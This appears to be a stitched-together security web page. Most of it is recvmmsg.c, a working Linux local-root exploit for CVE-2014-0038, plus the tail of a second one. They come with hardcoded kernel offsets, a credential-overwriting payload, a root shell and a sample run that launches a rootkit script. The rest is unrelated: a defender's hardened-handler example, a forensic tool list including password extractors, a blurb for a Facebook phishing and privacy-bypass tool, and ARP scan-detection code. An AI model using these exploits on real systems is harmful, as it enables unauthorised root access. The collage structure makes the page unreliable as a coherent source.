sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);

printf("waiting 255 seconds...\n");
for (i = 0; i < 255; i++) {
if (i % 10 == 0)
printf("%is/255s\n", i);
sleep(1);
}

printf("waking up parent...\n");
sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
exit(EXIT_SUCCESS);
} else if (pid > 0) {
retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
if (retval == -1) {
printf("address can't be written to, not a valid timespec struct\n");
exit(EXIT_FAILURE);
}
waitpid(pid, 0, 0);
printf("byte zeroed out\n");
} else {
perror("fork()");
exit(EXIT_FAILURE);
}
}

int main(int argc, char** argv)
{
long code, target;
int pwn;

/* Prepare payload... */
printf("preparing payload buffer...\n");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);

/*
* Now clear the three most significant bytes of the fops pointer
* to the release function.
* This will make it point into the memory region mapped above.
*/
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
zero_out(target + 7);
zero_out(target + 6);
zero_out(target + 5);

/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", 'r');
close(pwn);

if (getuid() != 0) {
printf("failed to get root :(\n");
exit(EXIT_FAILURE);
}

printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);
}


Exploit Linux 3.4+ Local Root (CONFIG_X86_X32=y)


OSVDB-ID: 2014-0038
Author: rebel
Published: 2014-02-02
/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------

takes about 13 minutes to run because timeout->tv_sec is decremented
once per second and 0xff*3 is 765.

some things you could do while waiting:
* watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
* read https://wiki.ubuntu.com/Security/Features and smirk a few times
* brew some coffee
* stare at the countdown giggly with anticipation

could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.

&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes

hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..

same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y

user@ubuntu:~$ uname -a
Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
user@ubuntu:~$ ./recvmmsg
byte 3 / 3.. ~0 secs left.
w00p w00p!
# id
uid=0(root) gid=0(root) groups=0(root)
# sh phalanx-2.6b-x86_64.sh
unpacking..

:)=

greets to my homeboys kaliman, beist, capsl & all of #social

Sat Feb 1 22:15:19 CET 2014
% rebel %
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <time.h>   /* time(), used to seed rand() below */

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
char *kernel_version;
unsigned long dest; // net_sysctl_root + 96
unsigned long original_value; // net_ctl_permissions
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
};

struct offset offsets[] = {
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
{NULL,0,0,0,0}
};

void udp(int b) {
int sockfd;
struct sockaddr_in servaddr,cliaddr;
int s = 0xff+1;

if(fork() == 0) {
while(s > 0) {
fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
sleep(1);
s--;
fprintf(stderr,".");
}

sockfd = socket(AF_INET,SOCK_DGRAM,0);
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
servaddr.sin_port=htons(port);
sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
exit(0);
}

}

void trigger() {
open("/proc/sys/net/core/somaxconn",O_RDONLY);

if(getuid() != 0) {
fprintf(stderr,"not root, ya blew it!\n");
exit(-1);
}

fprintf(stderr,"w00p w00p!\n");
system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char buf[BUFSIZE];
long mmapped;
struct utsname u;
struct offset *off = NULL;

uname(&u);

for(i=0;offsets[i].kernel_version != NULL;i++) {
if(!strcmp(offsets[i].kernel_version,u.release)) {
off = &offsets[i];
break;
}
}

if(!off) {
fprintf(stderr,"no offsets for this kernel version..\n");
exit(-1);
}

mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
mmapped &= 0x000000ffffffffff;

srand(time(NULL));
port = (rand() % 30000)+1500;

commit_creds = (_commit_creds)off->commit_creds;
prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(mmapped == -1) {
perror("mmap()");
exit(-1);
}

memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
perror("mprotect()");
exit(-1);
}

sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(-1);
}

sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);

if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(-1);
}

memset(msgs, 0, sizeof(msgs));

iovecs[0].iov_base = &buf;
iovecs[0].iov_len = BUFSIZE;
msgs[0].msg_hdr.msg_iov = &iovecs[0];
msgs[0].msg_hdr.msg_iovlen = 1;

for(i=0;i < 3 ;i++) {
udp(i);
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
if(!retval) {
fprintf(stderr,"\nrecvmmsg() failed\n");
}
}

close(sockfd);

fprintf(stderr,"\n");

trigger();
}
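
Both exploits on this page, saelo's timeoutpwn.c and rebel's recvmmsg.c, rest on the same defect: the x32 recvmmsg path treated a caller-supplied timeout pointer as safe to use in place, so the kernel's own per-second countdown of tv_sec became a write to a caller-chosen address. As an added defender's illustration for this page (neither exploit author's code nor the kernel's), the following user-space emulation puts the vulnerable handler shape beside the hardened one. USER_ADDR_MAX, KERNEL_ADDR_PLACEHOLDER, the ktimespec type and every function name are this example's assumptions, and the placeholder address is not a real kernel symbol.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>

/* Emulated user/kernel split of the x86-64 address space: user addresses lie
 * below this bound, kernel addresses above it. Assumed constant for this
 * example; the real kernel derives the bound from its memory layout. */
#define USER_ADDR_MAX 0x00007fffffffffffULL

/* Placeholder kernel-space address for the self-check (not a real symbol). */
#define KERNEL_ADDR_PLACEHOLDER 0xffffffff80000000ULL

struct ktimespec { long tv_sec; long tv_nsec; };

/* The bound copy_from_user()/copy_to_user() enforce: refuse any range that
 * is not entirely inside user space before touching a single byte of it. */
static int user_range_ok(uint64_t addr, size_t len)
{
    return addr <= USER_ADDR_MAX && len <= USER_ADDR_MAX - addr + 1;
}

/* The value check the page describes: tv_sec must not be negative and
 * tv_nsec must be below one second. This is a check on the contents, not on
 * where the struct lives, so on its own it does not stop the bug. */
int timespec_valid(const struct ktimespec *ts)
{
    return ts->tv_sec >= 0 && ts->tv_nsec >= 0 && ts->tv_nsec < 1000000000L;
}

/* Vulnerable shape: the handler trusts the caller's pointer and updates the
 * struct in place, so the countdown is a write to whatever address the
 * caller named. Kept here for contrast only; never call it with anything
 * but a local buffer. */
int recvmmsg_timeout_vulnerable(uint64_t user_ptr, long elapsed_sec)
{
    struct ktimespec *to = (struct ktimespec *)(uintptr_t)user_ptr;
    if (!timespec_valid(to))
        return -EINVAL;
    to->tv_sec -= elapsed_sec;
    return 0;
}

/* Hardened shape: copy in through the range check, validate, work only on
 * the private kernel copy, and copy the remaining time back through the
 * same range check. A kernel address is refused before anything is read. */
int recvmmsg_timeout_hardened(uint64_t user_ptr, long elapsed_sec)
{
    struct ktimespec to;
    if (!user_range_ok(user_ptr, sizeof(to)))
        return -EFAULT;
    memcpy(&to, (const void *)(uintptr_t)user_ptr, sizeof(to));
    if (!timespec_valid(&to))
        return -EINVAL;
    to.tv_sec = elapsed_sec >= to.tv_sec ? 0 : to.tv_sec - elapsed_sec;
    memcpy((void *)(uintptr_t)user_ptr, &to, sizeof(to));
    return 0;
}

/* Self-check on constructed inputs. Returns a bitmask: bit 0 = a legitimate
 * user-space timespec is counted down (300 s minus 255 s leaves 45 s),
 * bit 1 = a kernel address is rejected with -EFAULT, bit 2 = an invalid
 * timespec is rejected with -EINVAL. All three hold when the result is 7. */
int self_check(void)
{
    struct ktimespec ts = { 300, 0 }, bad = { -1, 0 };
    int ok = 0;
    if (recvmmsg_timeout_hardened((uint64_t)(uintptr_t)&ts, 255) == 0 && ts.tv_sec == 45)
        ok |= 1;
    if (recvmmsg_timeout_hardened(KERNEL_ADDR_PLACEHOLDER, 1) == -EFAULT)
        ok |= 2;
    if (recvmmsg_timeout_hardened((uint64_t)(uintptr_t)&bad, 1) == -EINVAL)
        ok |= 4;
    return ok;
}
```

The point the self-check makes is that the tv_sec/tv_nsec restriction both exploit headers mention is a value check, not a location check: only the copy_from_user-style bound on the pointer keeps a kernel address out of the handler, and it has to run before any byte at that address is read or written.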

Collection Of Free Computer Forensic Tools



Disk tools and data capture

Name | From | Description
DumpIt | MoonSols | Generates physical memory dump of Windows machines, 32 and 64 bit. Can run from a USB flash drive.
EnCase Forensic Imager | Guidance Software | Create EnCase evidence files and EnCase logical evidence files [direct download link]
Encrypted Disk Detector* | Magnet Forensics | Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
EWF MetaEditor | 4Discovery | Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
FAT32 Format | Ridgecrop | Enables large capacity disks to be formatted as FAT32
Forensics Acquisition of Websites | Web Content Protection Association | Browser designed to forensically capture web pages
FTK Imager* | AccessData | Imaging tool, disk viewer and image mounter
Guymager | vogu00 | Multi-threaded GUI imager running under Linux
HotSwap | Kazuyuki Nakayama | Safely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area
LiveView | CERT | Allows examiner to boot dd images in VMware.
P2 Explorer Free | Paraben | Mount forensic images as read-only local logical and physical disks
Live RAM Capturer* | Belkasoft | Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
OSFClone | Passmark Software | Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
OSFMount | Passmark Software | Mounts a wide range of disk images. Also allows creation of RAM disks
Tableau Imager* | Tableau | Imaging tool for use with Tableau imaging products
VHD Tool | Microsoft | Converts raw disk images to VHD format which are mountable in Windows Disk Management


Email analysis

Name | From | Description
EDB Viewer | Lepide Software | Open and view (not export) Outlook EDB files without an Exchange server
Mail Viewer | MiTeC | Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
OST Viewer | Lepide Software | Open and view (not export) Outlook OST files without connecting to an Exchange server
PST Viewer | Lepide Software | Open and view (not export) Outlook PST files without needing Outlook


General

Name | From | Description
Agent Ransack | Mythicsoft | Search multiple files using Boolean operators and Perl Regex
CaseNotes Lite | Blackthorn | Contemporaneous notes recorder
Computer Forensic Reference Data Sets | NIST | Collated forensic images for training, practice and validation
EvidenceMover* | Nuix | Copies data between locations, with file comparison, verification, logging
FastCopy | Shirouzu Hiroaki | Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
File Signatures | Gary Kessler | Table of file signatures
HashMyFiles | Nirsoft | Calculate MD5 and SHA1 hashes
MobaLiveCD | Mobatek | Run Linux live CDs from their ISO image without having to boot to them
Mouse Jiggler | Arkane Systems | Automatically moves mouse pointer stopping screen saver, hibernation etc.
Notepad ++ | Notepad ++ | Advanced Notepad replacement
NSRL | NIST | Hash sets of ‘known’ (ignorable) files
Quick Hash | Ted Technology | A Linux & Windows GUI for individual and recursive SHA1 hashing of files
USB Write Blocker | DSi | Enables software write-blocking of USB ports
USB Write Blocker | Sécurité Multi-Secteurs | Software write blocker for Windows XP through to Windows 8
Windows Forensic Environment | Troy Larson | Guide by Brett Shavers to creating and working with a Windows boot CD


File and data analysis

Name | From | Description
Advanced Prefetch Analyser | Allan Hay | Reads Windows XP, Vista and Windows 7 prefetch files
analyzeMFT | David Kovar | Parses the MFT from an NTFS file system allowing results to be analysed with other tools
Defraser | Various | Detects full and partial multimedia files in unallocated space
eCryptfs Parser | Ted Technology | Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Encryption Analyzer | Passware | Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
ExifTool | Phil Harvey | Read, write and edit Exif data in a large number of file types
Forensic Image Viewer | Sanderson Forensics | View various picture formats, image enhancer, extraction of embedded Exif, GPS data
Highlighter | Mandiant | Examine log files using text, graphic or histogram views
Link Parser | 4Discovery | Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
LiveContactsView | Nirsoft | View and export Windows Live Messenger contact details
RSA Netwitness Investigator* | EMC | Network packet capture and analysis
Memoryze | Mandiant | Acquire and/or analyse RAM images, including the page file on live systems
MetaExtractor | 4Discovery | Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
MFTview | Sanderson Forensics | Displays and decodes contents of an extracted MFT file
NetSleuth | NetGrab | Network monitoring tool, with covert “silent port scanning”
PictureBox | Mike’s Forensic Tools | Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
PsTools | Microsoft | Suite of command-line Windows utilities
Shadow Explorer | Shadow Explorer | Browse and extract files from shadow copies
Simple File Parser | Chris Mayhew | GUI tool for parsing .lnk files, prefetch and jump list artefacts
SQLite Manager | Mrinal Kant, Tarakant Tripathy | Firefox add-on enabling viewing of any SQLite database
Strings | Microsoft | Command-line tool for text searches
Structured Storage Viewer | MiTec | View and manage MS OLE Structured Storage based files
Switch-a-Roo | Mike’s Forensic Tools | Text replacement/converter/decoder for when dealing with URL encoding, etc
Windows File Analyzer | MiTeC | Analyse thumbs.db, Prefetch, INFO2 and .lnk files


Mac OS tools

Name | From | Description
Audit | Twocanoes Software | Audit Preference Pane and Log Reader for OS X
Disk Arbitrator | Aaron Burghardt | Blocks the mounting of file systems, complementing a write blocker in disabling disk arbitration
Epoch Converter* | Blackbag Technologies | Converts epoch times to local time and UTC
FTK Imager CLI for Mac OS* | AccessData | Command line Mac OS version of AccessData’s FTK Imager
IORegInfo | Blackbag Technologies | Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
Mac Memory Reader | Cyber Marshal | Command-line utility to capture physical RAM from Mac OS systems
PMAP Info* | Blackbag Technologies | Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors


Mobile devices

Name | From | Description
iPhone Analyzer | Leo Crawford, Mat Proud | Explore the internal file structure of iPad, iPod and iPhones
ivMeta | Robin Wood | Extracts phone model and software version and created date and GPS data from iPhone videos.
Rubus* | CCL Forensics | Deconstructs Blackberry .ipd backup files
SAFT | SignalSEC Corp | Obtain SMS messages, call logs and contacts from Android devices
WhatsApp Forensics | Zena Forensics | Extract WhatsApp messages from iOS and Android backups


Data analysis suites

Name | From | Description
Autopsy | Brian Carrier | Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
Backtrack | Backtrack | Penetration testing and security audit with forensic boot capability
Caine | Nanni Bassetti | Linux based live CD, featuring a number of analysis tools
Deft | Dr. Stefano Fratepietro and others | Linux based live CD, featuring a number of analysis tools
Digital Forensics Framework | ArxSys | Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
Forensic Scanner | Harlan Carvey | Automates ‘repetitive tasks of data collection’. Fuller description here
Paladin* | Sumuri | Ubuntu based live boot CD for imaging and analysis
SIFT* | SANS | VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
The Sleuth Kit | Brian Carrier | Collection of UNIX-based command line file and volume system forensic analysis tools
Ubuntu guide | How-To Geek | Guide to using an Ubuntu live disk to recover partitions, carve files, etc.
Volatility Framework | Volatile Systems | Collection of tools for the extraction of artefacts from RAM


File viewers

Name | From | Description
Microsoft PowerPoint 2007 Viewer | Microsoft | View PowerPoint presentations
Microsoft Visio 2010 Viewer | Microsoft | View Visio diagrams
VLC | VideoLAN | View most multimedia files and DVD, Audio CD, VCD, etc.


Internet analysis

Name | From | Description
Chrome Session Parser | CCL Forensics | Python module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”)
ChromeCacheView | Nirsoft | Reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache
Cookie Cutter | Mike’s Forensic Tools | Extracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits.
Dumpzilla | Busindre | Runs in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information.
Facebook Profile Saver | Belkasoft | Captures information publicly available in Facebook profiles.
IECookiesView | Nirsoft | Extracts various details of Internet Explorer cookies
IEPassView | Nirsoft | Extract stored passwords from Internet Explorer versions 4 to 8
MozillaCacheView | Nirsoft | Reads the cache folder of Firefox/Mozilla/Netscape Web browsers
MozillaCookieView | Nirsoft | Parses the cookie folder of Firefox/Mozilla/Netscape Web browsers
MozillaHistoryView | Nirsoft | Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web pages
MyLastSearch | Nirsoft | Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
PasswordFox | Nirsoft | Extracts the user names and passwords stored by Mozilla Firefox Web browser
OperaCacheView | Nirsoft | Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
OperaPassView | Nirsoft | Decrypts the content of the Opera Web browser password file, wand.dat
Web Historian | Mandiant | Reviews list of URLs stored in the history files of the most commonly used browsers
Web Page Saver* | Magnet Forensics | Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages


Registry analysis

Name | From | Description
ForensicUserInfo | Woanware | Extracts user information from the SAM, SOFTWARE and SYSTEM hive files and decrypts the LM/NT hashes from the SAM file
Process Monitor | Microsoft | Examine Windows processes and registry threads in real time
Registry Decoder | US National Institute of Justice, Digital Forensics Solutions | For the acquisition, analysis, and reporting of registry contents
RegRipper | Harlan Carvey | Registry data extraction and correlation tool
Regshot | Regshot | Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
sbag | TZWorks | Extracts data from Shellbag entries
USB Device Forensics | Woanware | Details previously attached USB devices on exported registry hives
USB Historian | 4Discovery | Displays 20+ attributes relating to USB device use on Windows systems
USBDeview | Nirsoft | Details previously attached USB devices
User Assist Analysis | 4Discovery | Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
UserAssist | Didier Stevens | Displays list of programs run, with run count and last run date and time
Windows Registry Recovery | MiTec | Extracts configuration settings and other information from the Registry


Application analysis

Name | From | Description
Dropbox Decryptor* | Magnet Forensics | Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
Google Maps Tile Investigator* | Magnet Forensics | Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
KaZAlyser | Sanderson Forensics | Extracts various data from the KaZaA application
LiveContactsView | Nirsoft | View and export Windows Live Messenger contact details
SkypeLogView | Nirsoft | View Skype calls and chats


Abandonware

Name | From | Description
DCode | Digital Detective | Converts various data types to date/time values
iPhone Backup Browser | Rene Devichi | View unencrypted backups of iPad, iPod and iPhones
ChromeAnalysis | Foxton Software | Analysis of internet history data generated using Google Chrome
IEHistoryView | Nirsoft | Extracts recently visited Internet Explorer URLs



[FBHT v2.0] Facebook Hacking Tool



FBHT (Facebook Hacking Tool) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform


The tool provides:
  • Tests account handling (Create, Delete, Friend, Accept)
  • Youtube videos phishing
  • Facebook links preview modification
  • Friends list privacy bypass
  • Graph support
  • More...

[Sub7 v0.5] Remote Administration Tool

[WormTrack] Detection of scanning worms, and machine scans



A network IDS that detects scanning worms on a local area network by monitoring anomalous ARP traffic. Because ARP requests are broadcast to every host on the segment, scanning threats can be detected without privileged access to a switch to set up a dedicated monitor port, and without constant updating of a rules engine to address new threats.
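
One way the ARP-anomaly approach described above can be realised, as an added example written for this page rather than WormTrack's own code: any host on the segment counts how many distinct target addresses each sender asks for per time window, and a sender sweeping the subnet stands out against hosts that only ever resolve a handful of peers. The record layout, the window and threshold values and all function names are assumptions of this example, and the traffic is constructed inline.

```c
#include <stdint.h>
#include <string.h>

/* One ARP "who-has" request as seen on the segment (constructed type, not WormTrack's). */
struct arp_request {
    uint8_t  sender_mac[6];
    uint32_t target_ip;   /* host byte order: 0xC0A80001 is 192.168.0.1 */
    uint32_t ts;          /* seconds */
};

#define MAX_SENDERS 64
#define MAX_TARGETS 256

/* Per-sender state: the distinct targets asked for in the current window. */
struct sender_state {
    uint8_t  mac[6];
    uint32_t window_start;
    uint32_t targets[MAX_TARGETS];
    int      ntargets;
    int      flagged;
};

static struct sender_state *lookup(struct sender_state *tab, int *n,
                                   const uint8_t mac[6], uint32_t ts)
{
    for (int i = 0; i < *n; i++)
        if (memcmp(tab[i].mac, mac, 6) == 0)
            return &tab[i];
    if (*n >= MAX_SENDERS) return NULL;   /* table full: drop rather than overflow */
    struct sender_state *s = &tab[(*n)++];
    memset(s, 0, sizeof(*s));
    memcpy(s->mac, mac, 6);
    s->window_start = ts;
    return s;
}

static void note_target(struct sender_state *s, uint32_t ip)
{
    for (int i = 0; i < s->ntargets; i++)
        if (s->targets[i] == ip) return;  /* re-asking for a known host is normal */
    if (s->ntargets < MAX_TARGETS)
        s->targets[s->ntargets++] = ip;
}

/* Flag every sender that asks for at least `threshold` distinct target IPs within
 * `window_secs`; copies flagged MACs to `flagged` (up to max_flagged), returns the count. */
int detect_arp_scanners(const struct arp_request *reqs, int nreq,
                        uint32_t window_secs, int threshold,
                        uint8_t flagged[][6], int max_flagged)
{
    struct sender_state tab[MAX_SENDERS];
    int nsenders = 0, nflagged = 0;

    for (int i = 0; i < nreq; i++) {
        struct sender_state *s = lookup(tab, &nsenders, reqs[i].sender_mac, reqs[i].ts);
        if (s == NULL) continue;
        if (reqs[i].ts - s->window_start > window_secs) {
            s->window_start = reqs[i].ts;   /* quiet sender: start a fresh window */
            s->ntargets = 0;
        }
        note_target(s, reqs[i].target_ip);
        if (!s->flagged && s->ntargets >= threshold) {
            s->flagged = 1;
            if (nflagged < max_flagged) memcpy(flagged[nflagged], s->mac, 6);
            nflagged++;
        }
    }
    return nflagged;
}

/* Constructed sample traffic: a printer resolving two hosts now and then, and
 * one host sweeping 192.168.0.20 through .59 within four seconds. */
int build_sample(struct arp_request *out, int max)
{
    static const uint8_t printer[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0xAA};
    static const uint8_t sweeper[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0xBB};
    int n = 0;
    for (int i = 0; i < 6 && n < max; i++, n++) {
        memcpy(out[n].sender_mac, printer, 6);
        out[n].target_ip = (i % 2) ? 0xC0A80001u : 0xC0A80010u;
        out[n].ts = 10u * (uint32_t)i;
    }
    for (int i = 0; i < 40 && n < max; i++, n++) {
        memcpy(out[n].sender_mac, sweeper, 6);
        out[n].target_ip = 0xC0A80014u + (uint32_t)i;
        out[n].ts = 100u + (uint32_t)i / 10;
    }
    return n;
}

/* 10 s window, 16 distinct targets: returns 1 when the sweeper, and only it, is flagged. */
int sample_flags_only_sweeper(void)
{
    struct arp_request reqs[64];
    uint8_t flagged[4][6];
    int n = build_sample(reqs, 64);
    return detect_arp_scanners(reqs, n, 10, 16, flagged, 4) == 1 && flagged[0][5] == 0xBB;
}
```

A fixed threshold over a fixed window is deliberately simple; on a real segment the threshold would be tuned against a baseline of normal ARP rates, and hosts that legitimately probe many addresses (a DHCP server checking for conflicts, a monitoring station) would need an allow-list so they are not reported as worms.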


